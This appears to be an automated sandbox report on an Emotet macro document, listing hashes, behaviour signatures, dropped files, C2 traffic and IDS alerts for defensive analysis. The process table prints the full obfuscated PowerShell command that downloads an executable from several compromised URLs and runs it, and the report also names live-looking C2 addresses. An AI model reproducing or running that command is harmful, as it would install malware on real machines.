analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

check_copy.doc

Full analysis: https://app.any.run/tasks/cb88c02d-1a31-46e6-b246-a51add583a4d
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 16, 2019, 21:26:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Vero quo quam., Author: Jari Just, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Nov 15 20:13:00 2019, Last Saved Time/Date: Fri Nov 15 20:13:00 2019, Number of Pages: 1, Number of Words: 20, Number of Characters: 117, Security: 0
MD5:

7AE0DA163EB88FB8D41CF929BC29454E

SHA1:

4643B45D09D71EB8598904B56E19C4937E682B32

SHA256:

240DC3CE89AF35D019F05E770F97B2B95511B950933DD442D3563C8A2FE4B399

SSDEEP:

3072:vKceZtH+UaqFh5Rr/SzFaSadGBrjC48+WZ/POhh+/IoJl2YgTdqgnwk+:CceZtHNaqjSzGdD48+aPOn1oGF/nwD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • serialfunc.exe (PID: 2384)
      • serialfunc.exe (PID: 3732)
      • 66.exe (PID: 2884)
      • 66.exe (PID: 2440)
    • Emotet process was detected

      • 66.exe (PID: 2884)
    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 2384)
    • Connects to CnC server

      • serialfunc.exe (PID: 2384)
    • EMOTET was detected

      • serialfunc.exe (PID: 2384)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4000)
      • 66.exe (PID: 2884)
    • Executed via WMI

      • powershell.exe (PID: 4000)
    • PowerShell script executed

      • powershell.exe (PID: 4000)
    • Creates files in the user directory

      • powershell.exe (PID: 4000)
    • Starts itself from another location

      • 66.exe (PID: 2884)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2132)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2132)
    • Reads settings of System Certificates

      • powershell.exe (PID: 4000)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Vero quo quam.
Subject: -
Author: Jari Just
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:11:15 20:13:00
ModifyDate: 2019:11:15 20:13:00
Pages: 1
Words: 20
Characters: 117
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 136
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 66.exe no specs #EMOTET 66.exe serialfunc.exe no specs #EMOTET serialfunc.exe

Process information

PID
CMD
Path
Indicators
Parent process
2132"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\check_copy.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4000powershell -w hidden -enco JABBAGQAdAB5AGMAcQBjAHkAPQAnAEEAegBrAGQAdQBtAGoAcwBpAGEAYwAnADsAJABaAGcAdwBiAG8AYgB2AGkAbwAgAD0AIAAnADYANgAnADsAJABJAGgAdABiAGwAcgBxAHgAcwBwAD0AJwBQAGwAcQBjAHIAZgBpAHQAeQBoACcAOwAkAE0AcgBuAG4AaQBqAHQAdAB0AGQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoAZwB3AGIAbwBiAHYAaQBvACsAJwAuAGUAeABlACcAOwAkAFUAcABtAHAAZwB0AHoAeQBzAGoAcAB2AHgAPQAnAEEAdwBkAGcAdgBxAGsAeAB5AGMAJwA7ACQAVwB3AG8AdQByAG8AaABjAHYAYgBuAGcAPQAmACgAJwBuAGUAdwAtAG8AYgBqAGUAJwArACcAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AdwBlAGIAQwBsAGkARQBuAHQAOwAkAEwAZQBuAG0AbABjAHIAaAB2AHMAbQBjAD0AJwBoAHQAdABwAHMAOgAvAC8AaABvAHUAcwBlAGQAcgBlAGEAbQAuAG4AZQB0AC8AdwBvAHIAZABwAHIAZQBzAHMALwBBAEgAYQB1AEcAYgB0AFQALwAqAGgAdAB0AHAAOgAvAC8AcgBhAGoAYQBzAHQAaABhAG4AcgBhAGoAcAB1AHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHUAYQBiADkALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGkAYwBjAGwAYwByAGkAYwBrAGUAdABhAGkAbgBtAGUAbgB0AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AbwBjAGgAMQAvACoAaAB0AHQAcABzADoALwAvAGQAYQBuAHMAbwBmAGMAbwBuAHMAdQBsAHQAYQBuAGMAeQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AYgAvACoAaAB0AHQAcABzADoALwAvAGQAYQByAGIAYQByAGIAZAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHMAWgBsAHYANgAvACcALgAiAHMAcABgAGwASQB0ACIAKAAnACoAJwApADsAJABYAHMAcgBsAGEAdwB2AGgAdwBlAD0AJwBZAHEAbwByAGYAdgB1AGYAcgBzAGkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEIAcgBpAG8AZAB1AHEAbgBtACAAaQBuACAAJABMAGUAbgBtAGwAYwByAGgAdgBzAG0AYwApAHsAdAByAHkAewAkAFcAdwBvAHUAcgBvAGgAYwB2AGIAbgBnAC4AIgBEAE8AdwBOAGAAbABgAG8AYQBkAGYASQBMAGUAIgAoACQAQgByAGkAbwBkAHUAcQBuAG0ALAAgACQATQByAG4AbgBpAGoAdAB0AHQAZAApADsAJABBAHEAaABqAHMAbwBuAGEAawBjAGcAYgA9ACcAWQBiAHQAcAB2AHYAbQBpAGYAYgB0ACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQATQByAG4AbgBpAGoAdAB0AHQAZAApAC4AIgBMAEUATgBgAGcAYABUAGgAIgAgAC0AZwBlACAAMwAzADUAMQAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABBAGAAUgB0ACIAKAAkAE0AcgBuAG4AaQBqAHQAdAB0AGQAKQA7ACQAQQByAGUAawB2AHEAYQBnAG8APQAnAFEAbwBxAG4AbgBpAHAAZwBnACcAOwBiAHIAZQBhAGsAOwAkAFkAZABuAGEAaABzAGwAZgA9ACcATABmAHoAdAB5AHcAZgBpACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE0AdgBrAGUAaAB3AHUAcgB0AGQAawB3AD0AJwBUAGEAdwB1AGkAaAB2AGoAZwBlAGYAaQBxACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2440"C:\Users\admin\66.exe" C:\Users\admin\66.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2884--ade7e7caC:\Users\admin\66.exe
66.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3732"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe66.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2384--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 301
Read events
1 464
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
11

Dropped files

PID
Process
Filename
Type
2132WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA7C4.tmp.cvr
MD5:
SHA256:
4000powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5A24E76F14JRJID4SZ84.temp
MD5:
SHA256:
2132WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:9B02D68ABC5DFC48FDF6CD2FEF880293
SHA256:76B8A7E3ACDB547586A0BDDCF03CA039419906FAD6CCF19EA0AE4583D91E8F0E
4000powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
288466.exeC:\Users\admin\AppData\Local\serialfunc\serialfunc.exeexecutable
MD5:D28403ECEA469B395C350E759BE69080
SHA256:68FA7B153D1FEF8FA7FDBCE97316CDD5CACD6B4999923DC061EA5D6AE372D519
2132WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5AE3C415.wmfwmf
MD5:33899D6F9DA0C0DDC94F028E3FDDE7B8
SHA256:73D5648047E3EE01C83832A5E47F1486AD8F1F55CED95BB410BE640B67B6C894
2132WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8B378DCC62035BBABEF8B1C2A131A338
SHA256:7C1F83E56B3CF1632E1D1DDD8BFD13219F8133599041726FA2EA3FB98B22B275
4000powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b31e.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2132WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A62CC364.wmfwmf
MD5:1468F391D9DA1F558242F0E336CB5CD5
SHA256:33C278BCB990B3CFC5EAE72BDC99896965F224C4C3CCD17D93576F7A75C02983
2132WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83BE5312.wmfwmf
MD5:622CE5669427F459DE7AA64BBE5468D9
SHA256:D5D3B169D25C57D11C9249BF68EB169797224D7BBF953E772AB2524213932C0E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2384
serialfunc.exe
POST
200
65.23.154.17:8080
http://65.23.154.17:8080/taskbar/merge/add/merge/
US
binary
148 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
65.23.154.17:8080
IO Capital Princess, LLC
US
malicious
4000
powershell.exe
34.92.115.127:443
housedream.net
US
unknown

DNS requests

Domain
IP
Reputation
housedream.net
  • 34.92.115.127
malicious

Threats

PID
Process
Class
Message
2384
serialfunc.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
2384
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3 ETPRO signatures available at the full report
No debug info